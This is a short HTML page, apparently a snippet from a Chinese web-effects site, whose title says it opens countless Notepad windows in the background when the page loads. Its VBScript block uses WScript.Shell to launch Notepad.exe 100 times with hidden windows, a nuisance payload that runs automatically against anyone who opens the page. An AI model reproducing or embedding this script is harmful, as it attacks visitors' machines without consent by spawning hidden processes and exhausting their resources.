<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>网页特效|Linkweb.cn/Js|--- 打开网页后即在后台打开无数记事本</title>
</head>
<body>
<script language="Vbscript">
set wshshell=CreateObject("Wscript.shell")
dim x
for x = 1 to 100
wshshell.run"Notepad.exe",0
next
</script>
</body>
</html>